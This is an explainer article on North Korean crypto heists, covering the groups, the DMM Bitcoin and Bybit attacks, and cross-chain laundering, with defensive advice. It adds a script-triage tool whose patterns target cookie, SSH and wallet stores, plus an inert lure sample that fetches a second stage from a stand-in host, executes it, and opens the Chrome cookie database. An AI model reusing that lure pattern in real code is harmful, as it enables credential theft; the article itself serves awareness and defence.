How North Korea Stole $3 Billion in Crypto: The Hacker Tactics You Need to Know
Imagine losing your entire life savings in a single click. Now multiply that across millions of users and billions of dollars, and you have the last decade of North Korean cyber operations. Between 2017 and 2023, state-sponsored hackers from North Korea stole approximately $3 billion in cryptocurrency, according to a United Nations panel of experts. This was not opportunistic crime; it was a systematic campaign to fund weapons programs while bypassing international sanctions. With the February 2025 theft of nearly $1.5 billion in Ether from Bybit, the stakes have never been higher. Understanding how these groups operate is no longer just for security professionals; it matters to anyone who holds digital assets or runs a platform that custodies them.
The Scale of the Theft: From Millions to Billions
The numbers are staggering. Blockchain analysis firm Chainalysis reported in December 2024 that the pace has accelerated sharply: in 2023, DPRK-linked hackers stole $660.5 million across 20 incidents; in 2024 the figure jumped to $1.34 billion across 47 incidents, an increase of roughly 102% in a single year. The surge suggests that as conventional revenue sources dry up under sanctions pressure, Pyongyang leans more heavily on digital theft.
The most shocking example occurred in February 2025 when the Dubai-based exchange Bybit lost nearly $1.5 billion worth of Ether. Blockchain analysis firm Chainalysis classified this as the largest cryptocurrency theft in history. To put that in perspective, this single heist exceeded the combined value of all 47 cryptocurrency robberies attributed to North Korea throughout the entirety of 2024. It shows that these actors are not only getting bolder but also significantly more sophisticated in their execution.
Who Are the Hackers? Key Groups Behind the Attacks
These aren't lone wolves working from basements. They are organized units with military-grade resources. Several specific groups have been identified by intelligence agencies and cybersecurity firms:
- Lazarus Group: The oldest and most notorious umbrella group, known for the 2016 Bangladesh Bank heist (a SWIFT banking-network robbery, not a cryptocurrency theft) and for a long run of DeFi protocol and exchange compromises.
- TraderTraitor: The FBI's name for a Lazarus subgroup that goes after cryptocurrency companies through their employees. The FBI publicly attributed the 2024 DMM Bitcoin heist and the 2025 Bybit heist to TraderTraitor; the 2023 thefts from Atomic Wallet (about $100 million), Alphapo and CoinsPaid were attributed to Lazarus Group.
- Jade Sleet, UNC4899 and Slow Pisces: Not separate groups but the tracking names that Microsoft, Mandiant (Google) and Palo Alto Networks Unit 42 respectively use for the same activity cluster the FBI calls TraderTraitor. Each vendor sees a different slice of the campaign, which is why a single operation can appear under several names.
In 2024, these North Korea-affiliated groups accounted for 61% of all cryptocurrency stolen globally, despite representing only 20% of total incidents. This disparity highlights their superior targeting and execution capabilities compared to other cybercriminal organizations.
How They Do It: Social Engineering Over Brute Force
You might expect exotic cryptanalysis or zero-day exploits. The biggest weakness they exploit is people. Their primary weapon is patient, well-researched social engineering, and the May 2024 theft of $308 million from the Japanese exchange DMM Bitcoin is the textbook case.
Here is how the attack unfolded:
- The Hook: In late March 2024, an attacker posing as a recruiter on LinkedIn contacted an employee of Ginco, a Japan-based enterprise cryptocurrency wallet software company.
- The Payload: The target was sent a link to a malicious Python script hosted on GitHub, presented as a pre-employment coding test. The employee copied the code to their own GitHub page and ran it, and their device was compromised.
- The Access: After mid-May 2024, the attackers used stolen session cookie information to impersonate the compromised employee and gained access to Ginco's unencrypted communications system.
- The Heist: In late May 2024, the attackers used that access to manipulate a legitimate transaction request made by a DMM employee, redirecting 4,502.9 BTC (worth about $308 million at the time) to wallets they controlled.
The whole operation took months. The initial compromise happened in late March, but the theft did not occur until late May. That patience lets the attackers map internal systems, learn who requests and who approves transactions, and strike through a legitimate channel: a fraudulent transfer that rides a real employee's real request is hard to distinguish from normal business at the moment of approval.
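The DMM case started with a "coding test" that nobody inspected before running it. The following is an added example for this article, not code from the original page, from Ginco, from DMM Bitcoin or from any vendor: a static triage pass that parses a recruiter's Python script and flags the indicators such lures depend on (dynamic code execution, downloader and database modules, references to browser cookie stores, smuggled base64 blobs). The two sample scripts at the bottom are constructed for illustration; the "lure" one is inert and points at a reserved `.invalid` domain.

```python
"""Static triage of a recruiter's take-home test before anyone runs it.

Added example; not the article's or any vendor's code. Sample scripts are constructed.
"""
import ast
import re
from typing import List

# Built-ins that turn a string or a downloaded blob into running code.
DYNAMIC_EXEC = {"exec", "eval", "compile", "__import__"}
# Modules a coding exercise rarely needs but a downloader or cookie stealer does.
SUSPICIOUS_MODULES = {
    "socket", "subprocess", "ctypes", "urllib", "requests", "http",
    "sqlite3", "base64", "zlib", "marshal", "winreg",
}
# Strings pointing at browser cookie/credential stores, SSH keys or wallets.
SENSITIVE_PATH_RE = re.compile(
    r"(Cookies|Login Data|Local State|Application Support/Google/Chrome|"
    r"AppData.Local.Google.Chrome|\.mozilla.firefox|Keychains|\.ssh|wallet)",
    re.IGNORECASE,
)
# A long base64-looking literal is a common way to smuggle a second stage.
LONG_B64_RE = re.compile(r"[A-Za-z0-9+/]{80,}={0,2}")


def dotted_name(node):
    """Render a Name/Attribute chain such as builtins.exec as 'builtins.exec'."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def triage(source: str) -> List[str]:
    """Return human-readable findings; an empty list means no indicator fired."""
    try:
        tree = ast.parse(source)
    except SyntaxError as exc:
        # Heavily obfuscated lures often are not even valid Python.
        return [f"does not parse as Python ({exc.msg}); treat as hostile"]

    findings = []
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            modules = [alias.name for alias in node.names]
        elif isinstance(node, ast.ImportFrom):
            modules = [node.module or ""]
        else:
            modules = []
        for mod in modules:
            if mod.split(".")[0] in SUSPICIOUS_MODULES:
                findings.append(f"imports {mod}")

        if isinstance(node, ast.Call):
            name = dotted_name(node.func)
            # Only the bare built-in or builtins.<name>; re.compile() is not flagged.
            if name in DYNAMIC_EXEC or (
                name and name.startswith("builtins.") and name.split(".")[-1] in DYNAMIC_EXEC
            ):
                findings.append(f"dynamic code execution via {name}()")

        if isinstance(node, ast.Constant) and isinstance(node.value, str):
            if SENSITIVE_PATH_RE.search(node.value):
                findings.append(f"references a credential store: {node.value!r}")
            if LONG_B64_RE.fullmatch(node.value.strip()):
                findings.append("embeds a long base64-looking blob")
    return findings


# Constructed sample: what an honest take-home test looks like.
BENIGN_TEST = '''
import json
from collections import Counter

def word_frequencies(text):
    """Return the five most common words in a string."""
    return Counter(text.lower().split()).most_common(5)

if __name__ == "__main__":
    print(json.dumps(word_frequencies("the quick brown fox jumps over the lazy dog")))
'''

# Constructed sample: the shape of a lure (inert; example.invalid never resolves).
LURE_TEST = '''
import base64, os, sqlite3
from urllib.request import urlopen

def run_tests():
    stage2 = urlopen("https://example.invalid/test_runner").read()
    exec(base64.b64decode(stage2))   # the "test runner" is really a second stage

def load_fixture():
    db = os.path.expanduser("~/Library/Application Support/Google/Chrome/Default/Cookies")
    return sqlite3.connect(db)
'''

if __name__ == "__main__":
    for label, src in (("benign", BENIGN_TEST), ("lure", LURE_TEST)):
        print(f"{label}: {triage(src) or 'no indicators'}")
```

Anything that fires should be run, if at all, inside a disposable VM with no access to the browser profile, SSH keys or wallet software of the machine you actually work on. The heuristics are deliberately narrow so an ordinary exercise does not trip them; a clean result is not proof of safety, it just means the obvious lure patterns are absent.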
Laundering the Loot: Moving Money Across Chains
Stealing the money is only half the job; the other half is spending it without getting frozen. North Korean operators have become masters of cross-chain laundering. Within days of the Bybit hack, the FBI reported that the attackers were rapidly converting the stolen Ether into Bitcoin and other assets and dispersing it across thousands of addresses on multiple blockchains.
They lean on decentralized exchanges (DEXs) and cross-chain bridges because neither demands the identity checks a centralized exchange would. A typical path: swap stolen Ether for a stablecoin such as USDT on a DEX, bridge it to another chain such as Tron or Solana, then fan it out across thousands of fresh addresses. Each hop strips context from the trail, and once value is spread thinly across many addresses no single freeze recovers much of it. TRM Labs' analysis of the Bybit flows showed that this dispersion makes it very hard for regulators to freeze assets once they leave the immediate vicinity of the hack.
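To see why dispersion defeats freezing, it helps to run the tracing arithmetic an analyst would. The following is an added example for this article, not code from the page, from TRM Labs, from Chainalysis or from any exchange. It applies proportional ("haircut") taint tracing to a constructed transfer log that follows the hops described above (theft, DEX swap, clean liquidity mixing in, bridge, fan-out into 250 wallets) and measures how much of the stolen value a freeze of the largest tainted holders would still recover before and after the fan-out. Amounts are USD-equivalent, and the swap and the bridge are modelled as 1:1 hops between attacker addresses, which is an assumption of this example.

```python
"""Proportional (haircut) taint tracing over a constructed transfer log.

Added example; not the article's or any vendor's code. Transfer log is constructed.
"""
from collections import defaultdict
from typing import Dict, Iterable, List, Optional, Set, Tuple

Transfer = Tuple[str, str, str, float]  # (tx_id, from_address, to_address, amount_usd)


def build_scenario() -> List[Transfer]:
    """Theft -> DEX swap -> clean liquidity mixed in -> bridge -> 250-way fan-out."""
    txs: List[Transfer] = [
        ("t0", "victim_cold_wallet", "attacker_a", 1_000_000.0),  # the theft itself
        ("t1", "attacker_a", "attacker_b", 1_000_000.0),          # swap ETH->USDT, counterpart leg
        ("t2", "liquidity_provider", "attacker_b", 250_000.0),    # clean funds land at the same address
        ("t3", "attacker_b", "attacker_c_tron", 1_250_000.0),     # bridge to another chain
    ]
    for i in range(250):                                          # disperse into fresh wallets
        txs.append((f"t4_{i:03d}", "attacker_c_tron", f"mule_{i:03d}", 5_000.0))
    return txs


def propagate(transfers: Iterable[Transfer], seed_txs: Set[str],
              initial_balance: Optional[Dict[str, float]] = None
              ) -> Tuple[Dict[str, float], Dict[str, float]]:
    """Walk transfers in order; each hop carries taint in proportion to the sender's tainted share.

    Returns (balance, tainted) per address. Transfers listed in seed_txs are the theft:
    every unit they move is counted as stolen regardless of the sender's history.
    """
    balance: Dict[str, float] = defaultdict(float, initial_balance or {})
    tainted: Dict[str, float] = defaultdict(float)
    for tx_id, src, dst, amount in transfers:
        if tx_id in seed_txs:
            moved = amount
        else:
            bal = balance[src]
            # multiply first so exact ratios stay exact in floating point
            moved = amount * tainted[src] / bal if bal > 0 else 0.0
            balance[src] -= amount
            tainted[src] -= moved
        balance[dst] += amount
        tainted[dst] += moved
    return balance, tainted


def tainted_holders(tainted: Dict[str, float], floor: float = 0.01) -> Dict[str, float]:
    """Addresses still holding at least `floor` USD of tainted value (drops rounding dust)."""
    return {addr: v for addr, v in tainted.items() if v >= floor}


def freeze_coverage(tainted: Dict[str, float], k: int) -> float:
    """Share of outstanding tainted value recovered if the k largest holders were frozen now."""
    holders = sorted(tainted_holders(tainted).values(), reverse=True)
    total = sum(holders)
    return sum(holders[:k]) / total if total else 0.0


if __name__ == "__main__":
    txs = build_scenario()
    clean = {"liquidity_provider": 10_000_000.0}   # untainted liquidity, constructed
    _, before = propagate(txs[:4], {"t0"}, clean)
    _, after = propagate(txs, {"t0"}, clean)
    print(f"before fan-out: {len(tainted_holders(before))} tainted address, "
          f"freezing the top 1 recovers {freeze_coverage(before, 1):.0%}")
    print(f"after fan-out:  {len(tainted_holders(after))} tainted addresses, "
          f"freezing the top 10 recovers {freeze_coverage(after, 10):.0%}")
```

Two things the numbers show. First, the clean $250,000 that arrives at `attacker_b` dilutes the taint ratio to 80%, so every downstream mule is only 80% tainted; real investigators choose between haircut, FIFO and "poison" rules precisely because mixing changes the answer. Second, before the fan-out a single freeze would recover everything, while after it the ten largest holders together cover 4% of the stolen value, which is the practical meaning of the dispersion strategy described above.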
Why This Matters to You: The Ripple Effect
You might think, "I'm not an exchange CEO, why should I care?" The reality is that these attacks destabilize the entire market. When billions disappear overnight, user confidence plummets. Exchanges face increased insurance costs and stricter regulatory scrutiny. These costs are often passed down to users in the form of higher fees or reduced liquidity.
Furthermore, the success of these operations incentivizes other criminal groups to adopt similar tactics. Adding the 2024 total to the UN's 2017-2023 estimate puts cumulative North Korean crypto theft at roughly $4.3 billion through 2024, and past $5.8 billion once the Bybit heist is counted. This creates a hostile environment in which security must be paramount. If you hold crypto, you need to understand that centralized platforms are targets. Diversifying storage methods and using hardware wallets can mitigate some risks, but the systemic vulnerability remains.
| Date | Target | Amount Stolen | Initial Access / Technique |
|---|---|---|---|
| Feb 2025 | Bybit | ~$1.5 Billion (Ether) | Compromised Safe{Wallet} signing interface; multisig signers approved a disguised transaction that handed control of the cold wallet to the attacker |
| May 2024 | DMM Bitcoin (via Ginco) | $308 Million (4,502.9 BTC) | Social engineering (LinkedIn recruiter lure) + session cookie theft + manipulated transaction request |
| June 2023 | Atomic Wallet | ~$100 Million | Root cause not publicly disclosed; attributed to Lazarus Group |
| July 2023 | Alphapo & CoinsPaid | ~$97 Million combined | Months of social engineering including fake job offers to employees (per CoinsPaid's post-mortem); Alphapo's root cause not publicly detailed |
Defending Against State-Sponsored Threats
While individuals cannot stop nation-state hackers, they can reduce their exposure. The key takeaway from the DMM and Bybit cases is that trust in centralized intermediaries carries risk. Here are practical steps to enhance your security posture:
- Use Hardware Wallets: Keep long-term holdings on a hardware wallet, where the private key is generated and held inside the device and never touches your computer. Malware on the host cannot export the key, but it can alter the transaction it asks the device to sign, so verify the destination address and amount on the device's own screen before approving. The Bybit signers were shown one transaction by a compromised web interface and signed another.
- Verify Communication Channels: Be wary of unsolicited messages on professional networks like LinkedIn. Never run scripts or open attachments from unknown sources, even if they appear to come from reputable companies.
- Enable Multi-Factor Authentication (MFA): Prefer FIDO2/WebAuthn hardware security keys (such as a YubiKey), which bind the login to the legitimate site's origin and so cannot be replayed from a phishing page. SMS codes can be intercepted through SIM swapping, and authenticator-app codes can be phished in real time.
- Diversify Platforms: Don't keep all your assets on one exchange. Spread risk across multiple reputable platforms and self-custody solutions.
- Monitor Blockchain Activity: Use tools provided by firms like Chainalysis or independent block explorers to monitor unusual activity related to your assets, though this is more relevant for large holders.
The landscape is evolving. As sanctions intensify, North Korea will likely continue to expand its cyber operations. The FBI, National Police Agency of Japan, and international partners are actively investigating and attributing these attacks, but prevention remains the best defense. Stay informed, stay skeptical, and secure your keys.
Who is responsible for the $3 billion in stolen cryptocurrency?
State-sponsored hacking groups from North Korea are responsible. The umbrella group is Lazarus; the subgroup behind the recent exchange heists is tracked by the FBI as TraderTraitor and by Microsoft, Mandiant and Palo Alto Networks as Jade Sleet, UNC4899 and Slow Pisces respectively. These groups operate under the direction of the Democratic People's Republic of Korea (DPRK) to fund weapons programs.
What was the largest single cryptocurrency hack in history?
The February 2025 hack of the Dubai-based exchange Bybit is currently the largest. Nearly $1.5 billion worth of Ether was stolen in a single operation, surpassing all previous individual incidents.
How do North Korean hackers steal cryptocurrency?
They primarily use social engineering, such as fake job offers on LinkedIn, to get employees of exchanges and wallet vendors to run malicious code. From there they steal session cookies, impersonate staff and manipulate legitimate transaction requests (DMM Bitcoin), or compromise the software that signers rely on so that a multisig wallet's keyholders approve a disguised transaction (Bybit). In both cases the blockchain itself worked as designed; what was compromised were the people and tooling around the keys.
Can the stolen cryptocurrency be recovered?
Recovery is extremely difficult. Hackers use decentralized exchanges and cross-chain bridges to launder funds rapidly, dispersing them across thousands of wallets. While law enforcement tracks these movements, freezing and returning assets is rare due to the complexity and speed of the transfers.
Why is North Korea targeting cryptocurrency?
Cryptocurrency allows North Korea to circumvent international sanctions that restrict traditional banking and trade. The stolen funds are used to finance weapons of mass destruction and ballistic missile programs, making it a matter of national security for many countries.
Is my personal crypto account at risk?
While North Korean hackers primarily target large exchanges and infrastructure providers, individual users are at risk if they fall for phishing scams or use compromised devices. Using hardware wallets and strong authentication significantly reduces this risk.